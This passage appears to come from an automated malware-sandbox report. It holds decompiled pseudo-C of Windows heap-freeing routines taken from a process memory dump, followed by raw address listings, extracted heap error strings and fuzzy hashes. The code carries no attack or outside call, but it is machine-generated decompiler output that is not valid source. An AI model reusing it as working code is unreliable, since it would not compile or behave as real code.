							__eax = __eax -  *((intOrPtr*)(__edi + 0x14));
							__eflags =  *((intOrPtr*)(__edi + 8)) - __edx;
							if( *((intOrPtr*)(__edi + 8)) != __edx) {
								__eax = __eax + __eax;
								__eflags = __eax;
							}
							__ecx =  *(__edi + 0x20);
							__eax =  *(__edi + 0x20) + __eax * 4;
							goto L39;
						} else {
							__esi = __edi + 0xcc;
							__eax = E009025A0(__eflags,  *(__edi + 0xcc));
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E009026AA();
								__eflags = __al;
								if(__eflags != 0) {
									__ecx =  *[fs:0x18];
									__eax = 0xc0000194;
									 *( *[fs:0x18] + 0xbf4) = 0xc0000194;
									__esi =  *[fs:0x18];
									_push(0xc0000194);
									 *( *[fs:0x18] + 0x34) = E0090641D(__eflags);
									L57:
									 *(__ebp - 4) = 0xfffffffe;
									__eax = E0090CB46();
									__eflags =  *0x7ffe0380;
									if( *0x7ffe0380 != 0) {
										__eax =  *[fs:0x18];
										__eax =  *( *[fs:0x18] + 0x30);
										__eflags =  *(__eax + 0x240) & 0x00000001;
										if(( *(__eax + 0x240) & 0x00000001) != 0) {
											__ecx =  *(__ebp + 8);
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = 0x1022;
												 *(__ebp - 0xb6) = __ax;
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x9c) =  *(__ebp - 0x4c);
												 *(__ebp - 0x98) = __ecx;
												__eax =  *(__ebp - 0x5c);
												__eflags = __eax;
												 *(__ebp - 0x94) = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x94) = __ecx;
												}
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x8c) =  *(__ebp - 0x38);
												__eax =  *(__ebp + 0xc);
												 *(__ebp - 0x90) =  *(__ebp + 0xc);
												 *(__ebp - 0x88) = 3;
												__eax = __ebp - 0xbc;
												_push(__ebp - 0xbc);
												_push(0x18);
												_push(0x20402);
												 *0x7ffe0380 & 0x000000ff = E008F01A4( *0x7ffe0380 & 0x000000ff);
											}
										}
									}
									__eax =  *(__ebp + 8);
									goto L22;
								}
								__eax = E008F22D0(__eflags,  *__esi);
								__edx = 0;
								__edx = 1;
								__ecx = __edi;
								__eax = E0090444F(__edi, 1);
								goto L29;
							} else {
								_t52 = __edi + 0xfc;
								 *_t52 =  *(__edi + 0xfc) + 1;
								__eflags =  *_t52;
								L29:
								 *((char*)(__ebp - 0x21)) = 1;
								_t55 = __ebp - 0x1c;
								 *_t55 =  *(__ebp - 0x1c) ^ 0x00000001;
								__eflags =  *_t55;
								goto L30;
							}
						}
					}
					__ecx = __eax + 7;
					__eflags =  *__ecx & 0x00000080;
					if(( *__ecx & 0x00000080) == 0) {
						goto L23;
					}
					__eflags =  *(__ebp - 0x1c) & 0x00000010;
					if(( *(__ebp - 0x1c) & 0x00000010) != 0) {
						goto L105;
					}
					__edx = __eax;
					__edx = __eax >> 3;
					__eax =  *__eax;
					__eax = __eax ^ __edx;
					__eax = __eax ^  *0x9d00a4;
					__ax =  *((intOrPtr*)(__eax + 0x10));
					__esi = __ax & 0x0000ffff;
					__al =  *__ecx;
					__eflags = __al - 5;
					if(__al == 5) {
						 *(__ebp - 0x28) =  *( *(__ebp - 0x28) + 4) & 0x0000ffff;
						__ecx =  *(__edi + 0x54) & 0x0000ffff;
						__eax =  *( *(__ebp - 0x28) + 4) & 0x0000ffff ^  *(__edi + 0x54) & 0x0000ffff;
					} else {
						__eflags = __al & 0x00000040;
						if((__al & 0x00000040) != 0) {
							__al & 0x000000ff = __al & 0x3f;
							__ecx =  *(__ebp - 0x28);
							__eax =  *( *(__ebp - 0x28) + 4 + (__al & 0x3f) * 8) & 0x0000ffff;
						} else {
							__al = __al & 0x0000003f;
							__eflags = (__al & 0x0000003f) - 0x3f;
							if((__al & 0x0000003f) == 0x3f) {
								__eflags = __al;
								__eax =  *(__ebp - 0x28);
								if(__al >= 0) {
									__eflags =  *(__edi + 0x4c);
									if( *(__edi + 0x4c) == 0) {
										__eax =  *__eax & 0x0000ffff;
									} else {
										__eax =  *__eax;
										__eflags =  *(__edi + 0x4c) & __eax;
										if(( *(__edi + 0x4c) & __eax) != 0) {
											__eflags = __eax;
										}
										__eax = __ax & 0x0000ffff;
									}
								} else {
									__eax =  *__eax;
									__eax = __eax ^ __edx;
									__eax = __eax ^  *0x9d00a4;
									__eax = __eax ^ __edi;
									__eflags = __eax;
									__ax =  *((intOrPtr*)(__eax + 0x10));
								}
								__eax = __ax & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *( *(__ebp - 0x28) + (__ax & 0x0000ffff) * 8 - 4);
							} else {
								__eax = __al & 0x000000ff;
								__eax = __al & 0x3f;
								__eflags = __eax;
							}
						}
					}
					__esi = __esi << 3;
					__esi = __esi - __eax;
					 *(__ebp - 0x38) = __esi;
					 *(__ebp - 0x1c) =  *(__ebp - 0x1c) & 0xc003ffff;
					__eax =  *(__ebp + 0xc);
					__eflags = __eax;
					if(__eax == 0) {
						__eax = __eax + 1;
					}
					 *(__ebp - 0x1c) =  *(__ebp - 0x1c) & 0xfffffff7;
					__eax = E008FE0C6(__edi,  *(__ebp - 0x1c) & 0xfffffff7,  *(__ebp - 0x1c) & 0xfffffff7);
					__ebx = __eax;
					 *(__ebp - 0x34) = __ebx;
					__eflags = __ebx;
					if(__ebx != 0) {
						__eax =  *(__ebp + 0xc);
						__eflags = __eax - __esi;
						if(__eax >= __esi) {
							__eax = __esi;
						}
						__eax = E00908980(__ebx,  *(__ebp + 8), __eax);
						__eflags =  *(__ebp + 0xc) - __esi;
						if( *(__ebp + 0xc) > __esi) {
							__eflags =  *(__ebp - 0x1c) & 0x00000008;
							if(( *(__ebp - 0x1c) & 0x00000008) != 0) {
								E008FDFC0(_t439 + _t431, 0,  *((intOrPtr*)(_t440 + 0xc)) - _t439);
							}
						}
						E008FE025(_t432, _t436,  *((intOrPtr*)(_t440 - 0x1c)),  *((intOrPtr*)(_t440 + 8)));
					}
					if( *0x7ffe0380 != 0) {
						_t423 =  *( *[fs:0x18] + 0x30);
						_t431 =  *(_t440 - 0x34);
						__eflags =  *(_t423 + 0x240) & 0x00000001;
						if(( *(_t423 + 0x240) & 0x00000001) != 0) {
							__eflags = _t431;
							if(_t431 != 0) {
								 *((short*)(_t440 - 0xee)) = 0x1022;
								 *((intOrPtr*)(_t440 - 0xd4)) = _t436;
								 *(_t440 - 0xd0) = _t431;
								 *((intOrPtr*)(_t440 - 0xcc)) =  *((intOrPtr*)(_t440 + 8));
								 *((intOrPtr*)(_t440 - 0xc4)) =  *((intOrPtr*)(_t440 - 0x38));
								 *((intOrPtr*)(_t440 - 0xc8)) =  *((intOrPtr*)(_t440 + 0xc));
								 *(_t440 - 0xc0) = 2;
								_push(_t440 - 0xf4);
								_push(0x18);
								_push(0x20402);
								E008F01A4( *0x7ffe0380 & 0x000000ff);
							}
						}
					}
					_t415 = _t431;
					goto L22;
				}
			}








                                                0x0090c85c
                                                0x0090c85c
                                                0x0090c85c
                                                0x0090c861
                                                0x0090c866
                                                0x0090c86b
                                                0x0090c86e
                                                0x0090c870
                                                0x0090c873
                                                0x0090c878
                                                0x0090c87b
                                                0x0090c87e
                                                0x0090c881
                                                0x0090c886
                                                0x0095d8bf
                                                0x0095d8cc
                                                0x0095d8d2
                                                0x00000000
                                                0x0090c88c
                                                0x0090c88c
                                                0x0090c88f
                                                0x0090c891
                                                0x0090c895
                                                0x0095d8de
                                                0x0095d8e1
                                                0x0095d8e1
                                                0x0090c89b
                                                0x0090c89e
                                                0x0090c8a5
                                                0x0090bb09
                                                0x0090c8ab
                                                0x0090c8ab
                                                0x0090c8ab
                                                0x0090c8b1
                                                0x0090c8b3
                                                0x0090c986
                                                0x0090c986
                                                0x0090c989
                                                0x0090c98c
                                                0x0090c98f
                                                0x0090c994
                                                0x0095d9ab
                                                0x0095d9b0
                                                0x00000000
                                                0x00000000
                                                0x0095d9bc
                                                0x0090c97e
                                                0x0090c983
                                                0x0090c983
                                                0x0090c99a
                                                0x0090c99a
                                                0x0090c99d
                                                0x0090c9a3
                                                0x0095d9c6
                                                0x0095d9cd
                                                0x0095d9d2
                                                0x0095d9d8
                                                0x0095d9df
                                                0x0095d9e0
                                                0x0095d9e5
                                                0x0093213e
                                                0x0093213e
                                                0x00000000
                                                0x0093213e
                                                0x0090c9a9
                                                0x0090c9ab
                                                0x00935261
                                                0x00935263
                                                0x00935263
                                                0x0090c9b7
                                                0x0090c9b9
                                                0x0090c9bf
                                                0x0090c9c2
                                                0x0090c9c5
                                                0x0090c9c9
                                                0x0090c9ee
                                                0x0090c9ee
                                                0x0090c9f5
                                                0x0090c9f9
                                                0x0095d9f1
                                                0x0095d9f4
                                                0x0095d9f4
                                                0x0090c9ff
                                                0x0090ca01
                                                0x0090ca04
                                                0x0090ca08
                                                0x0090ca0a
                                                0x0090ca0d
                                                0x0090ca12
                                                0x0090ca15
                                                0x0090ca17
                                                0x0090ca1a
                                                0x0095d9fb
                                                0x0095d9fd
                                                0x0095d9fe
                                                0x0095d9ff
                                                0x0095d9ff
                                                0x0090ca1a
                                                0x0090ca20
                                                0x0090ca23
                                                0x0090ca26
                                                0x0090ca2c
                                                0x0090ca2c
                                                0x0090ca2e
                                                0x0090ca2e
                                                0x0090ca31
                                                0x0090ca34
                                                0x0090ca36
                                                0x00000000
                                                0x00000000
                                                0x00923281
                                                0x00923283
                                                0x00923285
                                                0x009215c8
                                                0x009215c8
                                                0x00000000
                                                0x009215c8
                                                0x0092328b
                                                0x0092328b
                                                0x0090ca3c
                                                0x0090ca3d
                                                0x0090ca3f
                                                0x009215b9
                                                0x009215bb
                                                0x00934b10
                                                0x00934b12
                                                0x00000000
                                                0x00000000
                                                0x00934b18
                                                0x009215c1
                                                0x0090ca55
                                                0x0090ca55
                                                0x0090ca57
                                                0x0090ca59
                                                0x0090ca5c
                                                0x0090ca5f
                                                0x0090ca61
                                                0x0090ca64
                                                0x0090ca66
                                                0x0090ca66
                                                0x0090ca66
                                                0x0090ca66
                                                0x0090ca64
                                                0x0090ca5f
                                                0x0090ca6a
                                                0x0090ca6d
                                                0x0090ca74
                                                0x009342c7
                                                0x009342c7
                                                0x0090ca90
                                                0x0090ca90
                                                0x0090ca93
                                                0x0090ca96
                                                0x0090ca98
                                                0x0090ca9b
                                                0x0090caa0
                                                0x0095da30
                                                0x0095da37
                                                0x0095da3c
                                                0x0095da42
                                                0x0095da49
                                                0x0095da4f
                                                0x0090cb1c
                                                0x0090cb1c
                                                0x0090cb1c
                                                0x0090cb1c
                                                0x00000000
                                                0x0090cb1c
                                                0x0090caa6
                                                0x0090caa9
                                                0x0095da60
                                                0x0095da62
                                                0x0095da68
                                                0x0095da6a
                                                0x0095da6d
                                                0x0095da70
                                                0x0095da74
                                                0x0095da77
                                                0x0095da7a
                                                0x0095da84
                                                0x0090cae6
                                                0x0090cae6
                                                0x0090cae9
                                                0x0090caec
                                                0x0090caef
                                                0x0090caf2
                                                0x0090cb78
                                                0x0090cb7b
                                                0x0090cb7e
                                                0x0090cc0a
                                                0x0090cc0c
                                                0x0090cc0f
                                                0x0090cc0f
                                                0x0090cb84
                                                0x0090cb87
                                                0x0090cb8a
                                                0x0095dafd
                                                0x0095db00
                                                0x0090cb90
                                                0x0090cb90
                                                0x0090cb94
                                                0x0093fe32
                                                0x0093fe35
                                                0x0093fe39
                                                0x0093fe3d
                                                0x0093fe40
                                                0x0093fe42
                                                0x0093fe47
                                                0x0093fe4a
                                                0x0093fe4f
                                                0x0093fe54
                                                0x0095db16
                                                0x0095db1b
                                                0x0095db1b
                                                0x0093fe5a
                                                0x0090cb9a
                                                0x0090cb9a
                                                0x0090cb9f
                                                0x0090cba4
                                                0x0095db24
                                                0x0095db2a
                                                0x0095db2e
                                                0x0095db39
                                                0x0095db3e
                                                0x0095db3e
                                                0x0090cba4
                                                0x0090cb94
                                                0x0090cbaa
                                                0x0090cbad
                                                0x0090cbaf
                                                0x0090cbb1
                                                0x0090cbb5
                                                0x00923335
                                                0x0092333a
                                                0x00923340
                                                0x0090cbbb
                                                0x0090cbbb
                                                0x0090cbbe
                                                0x0090cbc2
                                                0x0095db46
                                                0x0095db48
                                                0x0095db48
                                                0x0095db4b
                                                0x0095db4e
                                                0x0095db52
                                                0x0095db53
                                                0x0095db53
                                                0x0095db55
                                                0x0095db57
                                                0x0095db57
                                                0x0095db5a
                                                0x0095db5d
                                                0x0095db5f
                                                0x0095db65
                                                0x0095db67
                                                0x0095db69
                                                0x0095db69
                                                0x0095db6c
                                                0x0095db78
                                                0x0095db7d
                                                0x0095db7d
                                                0x0095db6c
                                                0x0095db5f
                                                0x0090cbc2
                                                0x0090cbb5
                                                0x0090cbc8
                                                0x0090cbcb
                                                0x0090cbcf
                                                0x0095db87
                                                0x0095db8c
                                                0x0095db8f
                                                0x0095db93
                                                0x0095db94
                                                0x0095db94
                                                0x0090cbd5
                                                0x0090cbd8
                                                0x00921487
                                                0x0092148a
                                                0x0092148c
                                                0x0092148f
                                                0x00921492
                                                0x00921495
                                                0x0095db9f
                                                0x0095dba4
                                                0x0095dbb4
                                                0x0095dbb9
                                                0x0095dbb9
                                                0x0095dbbd
                                                0x0095dbc0
                                                0x0095dbc4
                                                0x0095dbca
                                                0x0095dbcd
                                                0x0095dbcf
                                                0x0095dbdb
                                                0x0095dbe1
                                                0x0095dbe6
                                                0x0095dbe9
                                                0x0095dbeb
                                                0x0095dc4c
                                                0x0095dc4f
                                                0x0095dbed
                                                0x0095dbed
                                                0x0095dbf3
                                                0x0095dbf6
                                                0x0095dbfa
                                                0x0095dc1c
                                                0x0095dc21
                                                0x0095dbfc
                                                0x0095dc02
                                                0x0095dc08
                                                0x0095dc14
                                                0x0095dc19
                                                0x0095dc19
                                                0x0095dc26
                                                0x0095dc27
                                                0x0095dc2a
                                                0x0095dc3f
                                                0x0095dc44
                                                0x0095dc44
                                                0x0092149b
                                                0x0092149b
                                                0x0092149e
                                                0x009214a1
                                                0x009214a3
                                                0x009214a6
                                                0x009214a9
                                                0x009214ab
                                                0x009214e7
                                                0x009214ad
                                                0x009214b0
                                                0x009214b5
                                                0x009214bb
                                                0x009214bd
                                                0x009214bd
                                                0x009214bd
                                                0x009214c5
                                                0x009214cb
                                                0x009214d7
                                                0x009214db
                                                0x009214dd
                                                0x009214dd
                                                0x00921495
                                                0x0090cbde
                                                0x0090cbe1
                                                0x0090cbe3
                                                0x0090cbe6
                                                0x0090cbef
                                                0x0090cbf2
                                                0x0090cbf4
                                                0x0090cbf7
                                                0x0090cbfa
                                                0x0095dc57
                                                0x0095dc59
                                                0x0095dc73
                                                0x0095dc76
                                                0x0095dc7a
                                                0x0095dc94
                                                0x0095dc97
                                                0x0095dc97
                                                0x0095dc9a
                                                0x0095dc9e
                                                0x0095dca1
                                                0x0095dca4
                                                0x00000000
                                                0x0095dca4
                                                0x0095dc7c
                                                0x0095dc7e
                                                0x0095dc81
                                                0x0095dc84
                                                0x0095dc86
                                                0x0095dc86
                                                0x0095dc89
                                                0x0095dc89
                                                0x0095dc8c
                                                0x0095dc8f
                                                0x0095dc8f
                                                0x00000000
                                                0x0095dc8f
                                                0x0095dc5b
                                                0x0095dc5d
                                                0x0095dc60
                                                0x0095dc62
                                                0x0095dc64
                                                0x0095dc6d
                                                0x00000000
                                                0x0095dc6d
                                                0x0090cc00
                                                0x0090cc03
                                                0x0090cc03
                                                0x00000000
                                                0x0090cbe6
                                                0x0090caf8
                                                0x0090cafb
                                                0x0090cafe
                                                0x0090cfdb
                                                0x0090cfdb
                                                0x0090cfdf
                                                0x00932135
                                                0x00000000
                                                0x00932135
                                                0x0090cfe5
                                                0x0090cfec
                                                0x0090cfef
                                                0x0090cff1
                                                0x0093535d
                                                0x00935367
                                                0x0093536f
                                                0x00935372
                                                0x00935375
                                                0x0093537d
                                                0x00935382
                                                0x00935386
                                                0x00935389
                                                0x0095dcab
                                                0x0095dcb0
                                                0x0095dcb9
                                                0x0095dcbc
                                                0x0095dcbc
                                                0x0095dcb0
                                                0x0093538f
                                                0x0090cff7
                                                0x0090cff7
                                                0x0090cffc
                                                0x0090d001
                                                0x0095dce5
                                                0x0095dce8
                                                0x0095dcea
                                                0x0095dcf3
                                                0x0095dcf6
                                                0x0095dcf6
                                                0x0095dcea
                                                0x0090d001
                                                0x0090d007
                                                0x0090d00a
                                                0x0090d00e
                                                0x0090d010
                                                0x0090d014
                                                0x0090d017
                                                0x0090d019
                                                0x0090d01d
                                                0x0090d01f
                                                0x0090d025
                                                0x0090d025
                                                0x0090d025
                                                0x0090d027
                                                0x0090d02b
                                                0x0090d038
                                                0x0090d044
                                                0x0090d047
                                                0x0090d04e
                                                0x0090d051
                                                0x0090d053
                                                0x0090d115
                                                0x0090d115
                                                0x0090d118
                                                0x0090d11b
                                                0x0090d11e
                                                0x00000000
                                                0x0090d059
                                                0x0090d059
                                                0x0090d05c
                                                0x0090d060
                                                0x0095dd2c
                                                0x0095dd2f
                                                0x0095dd2f
                                                0x0090d066
                                                0x0090d069
                                                0x0090d06c
                                                0x0090d070
                                                0x0090d072
                                                0x0090d075
                                                0x0090d07a
                                                0x0090d07d
                                                0x0090d07f
                                                0x0090d082
                                                0x0095dd36
                                                0x0095dd38
                                                0x0095dd39
                                                0x0095dd3a
                                                0x0095dd3a
                                                0x0090d082
                                                0x0090d088
                                                0x0090d08b
                                                0x0090d08f
                                                0x009353a1
                                                0x009353a4
                                                0x009353a8
                                                0x009353aa
                                                0x009353ad
                                                0x009353b2
                                                0x009353b5
                                                0x009353b7
                                                0x009353ba
                                                0x0095dd44
                                                0x0095dd46
                                                0x0095dd47
                                                0x0095dd48
                                                0x0095dd48
                                                0x009353ba
                                                0x009353c0
                                                0x009353c7
                                                0x009353cb
                                                0x0095dd52
                                                0x0095dd54
                                                0x0095dd57
                                                0x0095dd58
                                                0x0095dd59
                                                0x009353d1
                                                0x009353d2
                                                0x009353d7
                                                0x009353da
                                                0x009353dd
                                                0x009353dd
                                                0x009353e0
                                                0x009353e7
                                                0x009353eb
                                                0x00000000
                                                0x009353f1
                                                0x009353f1
                                                0x009353f5
                                                0x009353f9
                                                0x009353fb
                                                0x009353fe
                                                0x00935400
                                                0x00935403
                                                0x00935406
                                                0x00000000
                                                0x00935406
                                                0x0090d095
                                                0x0090d095
                                                0x0090d095
                                                0x0090d099
                                                0x0090d09b
                                                0x0090d09f
                                                0x0090d0a3
                                                0x0090d0a5
                                                0x0090d0a8
                                                0x0090d0aa
                                                0x0090d0ad
                                                0x0090d0b0
                                                0x0090d0b0
                                                0x0090d0b0
                                                0x0090d0b2
                                                0x0090d0b2
                                                0x0090d0b6
                                                0x0090d0ba
                                                0x0090d0c2
                                                0x0090d0c7
                                                0x0090d0cb
                                                0x0090d0cb
                                                0x0090d0cb
                                                0x0090d0cb
                                                0x0090d0cf
                                                0x0090d0d2
                                                0x0090d0d5
                                                0x0090d0d7
                                                0x0090d0d9
                                                0x0090d0db
                                                0x0090d0db
                                                0x0090d0e1
                                                0x0090d0e5
                                                0x0090d0ed
                                                0x0090d0ef
                                                0x0090d0f1
                                                0x0090d0f5
                                                0x0090d0f7
                                                0x0090d0fc
                                                0x0090d0ff
                                                0x0090d104
                                                0x0090d0f5
                                                0x0090d110
                                                0x00000000
                                                0x0090d110
                                                0x0090d08f
                                                0x0090d053
                                                0x0090cb0f
                                                0x0090cb14
                                                0x0090cb16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090cb16
                                                0x0090caaf
                                                0x0090cab2
                                                0x0090cab5
                                                0x0090cab8
                                                0x0090cabb
                                                0x0095da8c
                                                0x0095da90
                                                0x0095da94
                                                0x0090cadb
                                                0x0090cade
                                                0x0090cae1
                                                0x0090cae1
                                                0x0090cae3
                                                0x00000000
                                                0x0090cae3
                                                0x0090cac1
                                                0x0090cac4
                                                0x0095da9b
                                                0x0095da9e
                                                0x0095daa1
                                                0x00000000
                                                0x0095daa1
                                                0x0090cacf
                                                0x0090cad2
                                                0x0095daaa
                                                0x0095daac
                                                0x0095dac5
                                                0x0095dac9
                                                0x0095dae9
                                                0x0095daec
                                                0x0095daef
                                                0x0095daef
                                                0x0095daf3
                                                0x00000000
                                                0x0095daf3
                                                0x0095dacb
                                                0x0095dacd
                                                0x0095dad3
                                                0x0095dad6
                                                0x0095dad8
                                                0x0095dad8
                                                0x0095dadb
                                                0x0095dadb
                                                0x0095dae1
                                                0x0095dae4
                                                0x0095dae4
                                                0x00000000
                                                0x0095dae4
                                                0x0095daae
                                                0x0095dab0
                                                0x0095dab3
                                                0x0095dab5
                                                0x0095dab7
                                                0x0095dabf
                                                0x00000000
                                                0x0090cad8
                                                0x0090cad8
                                                0x0090cad8
                                                0x00000000
                                                0x0090cad8
                                                0x0090cad2
                                                0x0090ca7a
                                                0x0090ca80
                                                0x00000000
                                                0x00000000
                                                0x0090ca86
                                                0x0090ca8a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0090ca8a
                                                0x0090ca45
                                                0x0090ca45
                                                0x0090ca48
                                                0x0090ca4b
                                                0x0090ca4d
                                                0x0090ca4d
                                                0x0090ca4d
                                                0x0090ca4f
                                                0x0090ca52
                                                0x00000000
                                                0x0090c9cb
                                                0x0090c9cb
                                                0x0090c9d3
                                                0x0090c9d8
                                                0x0090c9da
                                                0x00934f09
                                                0x00934f0e
                                                0x00934f10
                                                0x0095da09
                                                0x0095da10
                                                0x0095da15
                                                0x0095da1b
                                                0x0095da22
                                                0x0095da28
                                                0x0090cb20
                                                0x0090cb20
                                                0x0090cb27
                                                0x0090cb2c
                                                0x0090cb33
                                                0x0095ddcd
                                                0x0095ddd3
                                                0x0095ddd6
                                                0x0095dddd
                                                0x0095dde3
                                                0x0095dde6
                                                0x0095dde8
                                                0x0095ddee
                                                0x0095ddf3
                                                0x0095ddfa
                                                0x0095ddfd
                                                0x0095de03
                                                0x0095de09
                                                0x0095de0c
                                                0x0095de0e
                                                0x0095de14
                                                0x0095de16
                                                0x0095de16
                                                0x0095de1c
                                                0x0095de1f
                                                0x0095de25
                                                0x0095de28
                                                0x0095de2e
                                                0x0095de38
                                                0x0095de3e
                                                0x0095de3f
                                                0x0095de41
                                                0x0095de4e
                                                0x0095de4e
                                                0x0095dde8
                                                0x0095dddd
                                                0x0090cb39
                                                0x00000000
                                                0x0090cb39
                                                0x00934f18
                                                0x00934f1d
                                                0x00934f1f
                                                0x00934f20
                                                0x00934f22
                                                0x00000000
                                                0x0090c9e0
                                                0x0090c9e0
                                                0x0090c9e0
                                                0x0090c9e0
                                                0x0090c9e6
                                                0x0090c9e6
                                                0x0090c9ea
                                                0x0090c9ea
                                                0x0090c9ea
                                                0x00000000
                                                0x0090c9ea
                                                0x0090c9da
                                                0x0090c9c9
                                                0x0090c8b9
                                                0x0090c8bc
                                                0x0090c8bf
                                                0x00000000
                                                0x00000000
                                                0x0090c8c5
                                                0x0090c8c9
                                                0x00000000
                                                0x00000000
                                                0x0090c8cf
                                                0x0090c8d1
                                                0x0090c8d4
                                                0x0090c8d6
                                                0x0090c8d8
                                                0x0090c8e0
                                                0x0090c8e4
                                                0x0090c8e7
                                                0x0090c8e9
                                                0x0090c8eb
                                                0x0095d8eb
                                                0x0095d8ef
                                                0x0095d8f3
                                                0x0090c8f1
                                                0x0090c8f1
                                                0x0090c8f3
                                                0x0095d8fd
                                                0x0095d900
                                                0x0095d903
                                                0x0090c8f9
                                                0x0090c8fb
                                                0x0090c8fe
                                                0x0090c901
                                                0x0094172c
                                                0x0094172e
                                                0x00941731
                                                0x0095d90d
                                                0x0095d911
                                                0x0095d925
                                                0x0095d913
                                                0x0095d913
                                                0x0095d915
                                                0x0095d918
                                                0x0095d91a
                                                0x0095d91a
                                                0x0095d91d
                                                0x0095d91d
                                                0x00941737
                                                0x00941737
                                                0x00941739
                                                0x0094173b
                                                0x00941741
                                                0x00941741
                                                0x00941743
                                                0x00941743
                                                0x00941747
                                                0x0094174a
                                                0x0094174d
                                                0x0090c907
                                                0x0090c907
                                                0x0090c90a
                                                0x0090c90a
                                                0x0090c90a
                                                0x0090c901
                                                0x0090c8f3
                                                0x0090c90d
                                                0x0090c910
                                                0x0090c912
                                                0x0090c915
                                                0x0090c91c
                                                0x0090c91f
                                                0x0090c921
                                                0x009342d0
                                                0x009342d0
                                                0x0090c92b
                                                0x0090c930
                                                0x0090c935
                                                0x0090c937
                                                0x0090c93a
                                                0x0090c93c
                                                0x0090c93e
                                                0x0090c941
                                                0x0090c943
                                                0x0090c945
                                                0x0090c945
                                                0x0090c94c
                                                0x0090c954
                                                0x0090c957
                                                0x0090c959
                                                0x0090c95d
                                                0x00908962
                                                0x00908967
                                                0x0090c95d
                                                0x0090c96a
                                                0x0090c96a
                                                0x0090c976
                                                0x0095d933
                                                0x0095d936
                                                0x0095d939
                                                0x0095d940
                                                0x0095d946
                                                0x0095d948
                                                0x0095d953
                                                0x0095d95a
                                                0x0095d960
                                                0x0095d969
                                                0x0095d972
                                                0x0095d97b
                                                0x0095d981
                                                0x0095d991
                                                0x0095d992
                                                0x0095d994
                                                0x0095d9a1
                                                0x0095d9a1
                                                0x0095d948
                                                0x0095d940
                                                0x0090c97c
                                                0x00000000
                                                0x0090c97c

                                                Strings
                                                • HEAP: , xrefs: 0095DC1C
                                                • HEAP[%wZ]: , xrefs: 0095DC0F
                                                • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 0095DC30
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                • API String ID: 0-212623055
                                                • Opcode ID: 48d269591015ef5fbf8f27c9e1328fe7867c27365600a1d1ab08e2389f37a84e
                                                • Instruction ID: b0b70228225d75fb2e45778c09883a1dafaed4782114436b07a6d735980772a8
                                                • Opcode Fuzzy Hash: 48d269591015ef5fbf8f27c9e1328fe7867c27365600a1d1ab08e2389f37a84e
                                                • Instruction Fuzzy Hash: E872EFB1A04259DFDB24CFA9C840BBEBBF5FF08310F148559E895AB291D338A945DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009029B2, Relevance: 4.6, Strings: 3, Instructions: 851COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E009029B2(signed int _a4, signed int _a8, signed int* _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v30;
				signed char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t388;
				intOrPtr* _t389;
				signed int* _t391;
				signed short _t394;
				signed int _t395;
				signed short _t396;
				signed char _t397;
				signed int _t399;
				signed int* _t400;
				intOrPtr _t403;
				signed short _t421;
				signed int _t422;
				signed char _t423;
				signed int _t425;
				intOrPtr _t427;
				signed short _t439;
				signed int _t452;
				signed char _t453;
				signed short _t456;
				intOrPtr* _t457;
				intOrPtr* _t459;
				signed short _t462;
				signed int* _t463;
				signed short _t464;
				signed char _t465;
				signed int _t467;
				signed int* _t468;
				intOrPtr _t471;
				signed short* _t488;
				signed short _t491;
				signed int* _t492;
				signed char _t493;
				signed int _t495;
				intOrPtr _t497;
				signed short _t509;
				signed int _t520;
				signed short _t522;
				signed int _t524;
				signed short _t528;
				intOrPtr* _t532;
				signed int _t533;
				intOrPtr _t534;
				signed int _t535;
				intOrPtr* _t537;
				signed int _t540;
				signed int _t547;
				signed int _t549;
				intOrPtr _t556;
				signed int _t557;
				signed short _t561;
				signed short _t564;
				intOrPtr* _t565;
				signed int _t567;
				signed int _t571;
				signed int _t573;
				signed short _t579;
				signed int _t580;
				signed int* _t592;
				intOrPtr _t593;
				signed int* _t594;
				intOrPtr _t595;
				signed int* _t596;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed short _t612;
				signed int _t613;
				unsigned int _t614;
				signed int _t617;
				intOrPtr* _t619;
				signed int _t621;
				signed int _t625;
				signed int _t627;
				signed int _t628;
				signed short _t634;
				signed int _t635;
				intOrPtr _t638;
				signed short _t639;
				signed short _t642;
				intOrPtr* _t644;
				intOrPtr _t645;
				signed int* _t646;
				signed short _t648;
				signed int _t650;
				signed int* _t651;
				signed short _t663;
				signed int _t665;
				signed int* _t666;
				signed short _t680;
				signed short _t683;
				intOrPtr* _t684;
				intOrPtr _t685;
				signed int* _t686;
				signed short _t687;
				signed short _t700;
				signed short _t702;
				signed short _t704;
				signed int* _t706;
				signed int _t713;
				signed int _t717;
				signed int _t719;
				signed int* _t720;
				signed int _t722;
				signed short _t724;
				void* _t727;

				_t520 = _a8;
				_t717 = _a4;
				_t719 = _t520 - (( *(_t520 + 4) & 0x0000ffff ^  *(_t717 + 0x54) & 0x0000ffff) << 3);
				if(_t719 == _t520) {
					L2:
					_t720 = _t520 +  *_a12 * 8;
					_a8 = _t720;
					if( *(_t717 + 0x4c) == 0) {
						L4:
